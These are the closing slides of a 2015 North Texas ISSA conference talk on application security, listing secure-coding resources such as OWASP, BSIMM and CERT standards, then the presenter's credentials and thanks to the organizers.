  • 71. @NTXISSA #NTXISSACSC3 RESOURCES OWASP: OPEN WEB APPLICATION SECURITY PROJECT https://www.owasp.org/index.php/Main_Page BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5 https://www.bsimm.com/ SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1 http://software-security.sans.org/resources/swat CERT: SECURE CODING STANDARDS http://www.cert.org/secure-coding/research/secure-coding-standards.cfm? AKAMAI TECHNOLOGIES (HEY, WHY NOT) https://www.akamai.com/us/en/cloud-security.jsp
  • 72. @NTXISSA #NTXISSACSC3 Tony Lauro | CISSP, GWAPT Senior Enterprise Security Architect @tonylauro
  • 73. @NTXISSA #NTXISSACSC3@NTXISSA #NTXISSACSC3 The Collin College Engineering Department Collin College Student Chapter of the North Texas ISSA North Texas ISSA (Information Systems Security Association) NTX ISSA Cyber Security Conference – October 2-3, 2015 73 Thank you